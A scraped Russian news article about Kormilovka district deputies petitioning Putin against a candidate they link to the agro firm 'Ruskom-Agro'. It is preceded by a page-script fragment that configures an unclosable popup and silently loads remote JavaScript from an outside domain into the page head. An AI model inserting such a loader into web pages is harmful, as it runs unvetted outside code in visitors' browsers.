, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
7 февраля, 2013 Политика

Путину предлагают вникнуть в проблемы омской Кормиловки

Путину предлагают вникнуть в проблемы омской Кормиловки

Депутаты Кормиловского районного совета, по инициативе которых прошлый глава Иосиф Ровейн был отправлен в отставку, написали письмо Путину о том, что им якобы навязывают кандидатуру Анны Саватаевой, которую они считают «несамостоятельной». Однако президент, по всей видимости, письма не увидит, так как подписанты не указали свой обратный адрес. В общественной приемной Президента РФ поясняют, что такие обезличенные обращения не рассматриваются.

Инициативная группа недовольных депутатов опубликовала письмо с критикой в адрес кандидата на пост главы Кормиловского района от «Единой России» Анны Саватаевой. Кормиловские народные избранники призывают Президента России Владимира Путина «вмешаться в ситуацию и защитить Кормиловский район от рейдерского захвата компанией «Руском – Агро»

«Избирательная кампания представителя ООО «Руском-Агро» напоминает подготовку к рейдерскому захвату нашего родного района. Их интересуют наши земли и МУП «Водоканал». Да и «свой» глава позволит, как говорят бизнесмены, повысить капитализацию их свинокомплекса», – говорится в письме.

Под письмом подписались 11 депутатов и 90 жителей райцентра. Письмо уже растиражировано омскими СМИ с пояснениями инициаторов акции, которые уверяют, что документ будет передан в приемную Путина 8 февраля.

В предвыборном штабе Анны Саватаевой не стали комментировать ситуацию с письмом, сославшись на отсутствие «уполномоченных лиц».

Как сообщили «СуперОмску» в общественной приемной Владимира Путина в Омской области, зарегистрировать письмо там не смогут. В нем не указаны данные человека, на чье имя должен прийти ответ, а кроме того, не указан вид формы, в которой написано письмо.

«Первым делом в письме в приемную Президента Российской Федерации пишутся фамилия, имя, отчество, если это коллективное обращение, то указывается человек, на чье имя должен прийти ответ. Указываются адрес проживания и контактный телефон. В середине пишется, что это  – «заявление» или «жалоба», далее излагаются обстоятельства и формулируется вопрос или просьба. В случае соблюдения всех этих требований письмо регистрируется, и в течение месяца приходит ответ», – пояснили в приемной президента.

Фото slon.ru

Владимир Войтович

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Политика